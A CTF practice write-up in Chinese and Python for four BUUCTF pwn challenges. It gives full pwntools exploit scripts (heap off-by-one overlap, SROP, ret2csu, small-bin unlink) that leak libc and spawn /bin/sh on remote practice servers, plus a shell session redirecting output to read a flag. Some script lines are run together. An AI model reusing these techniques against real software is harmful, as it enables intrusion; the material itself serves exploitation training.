PWN-PRACTICE-BUUCTF-17
- hitcontraining_heapcreator
- wustctf2020_closed
- ciscn_2019_es_7
- hitcon2014_stkof
hitcontraining_heapcreator
单字节溢出,修改下一个chunk的size,造成chunk overlap,实现任意地址读写
参考:buuctf hitcontraining_heapcreator HITCON Trainging lab13
# -*- coding:UTF-8 -*-
from pwn import *
#io=process("./heapcreator")
io=remote("node4.buuoj.cn",25331)
elf=ELF("./heapcreator")
libc=ELF("./libc-2.23-16-x64.so")def create(size,content):io.sendlineafter("Your choice :","1")io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap:",content)
def edit(index,content):io.sendlineafter("Your choice :","2")io.sendlineafter("Index :",str(index))io.sendlineafter("Content of heap : ",content)#单字节溢出
def show(index):io.sendlineafter("Your choice :","3")io.sendlineafter("Index :",str(index))
def delete(index):io.sendlineafter("Your choice :","4")io.sendlineafter("Index :",str(index))
def exit():io.sendlineafter("Your choice :","5")heaparray=0x00000000006020A0#gdb.attach(io)
#pause()create(0x18,"aaaa")
create(0x10,"bbbb")
create(0x10,"cccc")
create(0x10,"/bin/sh\x00")#pause()edit(0,"a"*0x18+"\x81")
delete(1)#pause()size="\x08".ljust(8,"\x00")
payload="d"*0x40+size+p64(elf.got["free"])
create(0x70,payload)#pause()show(2)
io.recvuntil("Content : ")
free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00"))
print("free_addr:"+hex(free_addr))
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]
edit(2,p64(system))
delete(3)#pause()io.interactive()
wustctf2020_closed
题目所给的elf文件关闭了标准输出(fd=1)和标准错误(fd=2)
利用重定向将标准输出重定向到标准输入(fd=0)
p1umh0@p1umh0:~/ctf/pwn$ nc node4.buuoj.cn 25787__ ___ ______ ___ / |/ /__ /_ __/__< /_ __/ /|_/ / _ `// / / __/ /\ \ /
/_/ /_/\_,_//_/ /_/ /_//_\_\ HaHaHa!
What else can you do???
exec 1>&0
cat flag
flag{b02e836b-f53a-4c9a-8287-b54b93c7c65f}
^C
ciscn_2019_es_7
栈溢出,SROP或者ret2csu均可
SROP exp:
from pwn import *
context.arch='amd64'
context.os='linux'
#io=process('./ciscn_2019_es_7')
io=remote("node4.buuoj.cn",29577)
elf=ELF('./ciscn_2019_es_7')
rax_0xf=0x4004DA
syscall=0x400517
vuln_addr=0x4004ED
payload='a'*0x10+p64(vuln_addr)
io.send(payload)
io.recv(0x20)
stack_addr=u64(io.recv(6).ljust(8,'\x00'))
print(stack_addr)
binsh_addr=stack_addr-0x118
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = binsh_addr
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall
payload='/bin/sh\x00'
payload=payload.ljust(0x10,'a')
payload+=p64(rax_0xf)+p64(syscall)+str(sigframe)
io.send(payload)
io.interactive()
ret2csu exp:
from pwn import *
#io=process('./ciscn_2019_es_7')
io=remote("node4.buuoj.cn",29577)
execve_addr=0x4004E2
syscall = 0x400517
part1=0x40059A
part2=0x400580
pop_rdi_ret = 0x00000000004005a3
vuln_addr=0x4004ED
payload='a'*0x10+p64(vuln_addr)
io.sendline(payload)
io.recv(0x20)
stack=u64(io.recv(8))
binsh_addr=stack-0x118
execve_stack=stack-0x110
payload='/bin/sh\x00'+p64(execve_addr)
def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):payload = p64(part1) # part1 entry pop_rbx_rbp_r12_r13_r14_r15_retpayload += p64(0x0) # rbx must be 0x0payload += p64(0x1) # rbp must be 0x1payload += p64(jmp2) # r12 jump topayload += p64(arg3) # r13 -> rdx arg3payload += p64(arg2) # r14 -> rsi arg2payload += p64(arg1) # r15d -> edi arg1payload += p64(part2) # part2 entry will call [r12+rbx*0x8]payload += 'A' * 56 # junk 6*8+8=56return payload
payload+=com_gadget(part1,part2,execve_stack,0,0,0)
payload+=p64(pop_rdi_ret)+p64(binsh_addr)+p64(syscall)
io.sendline(payload)
io.interactive()
hitcon2014_stkof
利用small bin 的 unlink实现任意地址读写,参考:前端 Unlink笔记&2014 HITCON stkof题解
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./stkof")
io=remote("node4.buuoj.cn",29090)
elf=ELF("./stkof")
libc=ELF("./libc-2.23-16-x64.so")
free_got=elf.got["free"]
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
atoi_got=elf.got["atoi"]def create(size):io.sendline("1")io.sendline(str(size))io.recvuntil("OK\n")
def fill(index,size,content):io.sendline("2")io.sendline(str(index))io.sendline(str(size))io.send(content)#io.recvuntil("OK\n")
def free(index):io.sendline("3")io.sendline(str(index))#io.recvuntil("OK\n")
def show(index):io.sendline("4")io.sendline(str(index))io.recvuntil("OK\n")#gdb.attach(io)
#pause()s=0x0000000000602140
create(0x100)#chunk1
create(0x30)#chunk2
create(0x80)#chunk3
FD=s+16-0x18
BK=s+16-0x10
payload=p64(0)+p64(0x30)+p64(FD)+p64(BK)
payload=payload.ljust(0x30,"A")
payload+=p64(0x30)+p64(0x90)
fill(2,len(payload),payload)#pause()free(3)#pause()payload="a"*0x10+p64(free_got)+p64(puts_got)+p64(atoi_got)
fill(2,len(payload),payload)
fill(1,len(p64(puts_plt)),p64(puts_plt))#pause()free(2)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym["puts"]
system=libc_base+libc.sym["system"]
fill(3,len(p64(system)),p64(system))
io.sendline("/bin/sh\x00")
#pause()io.interactive()
)
)
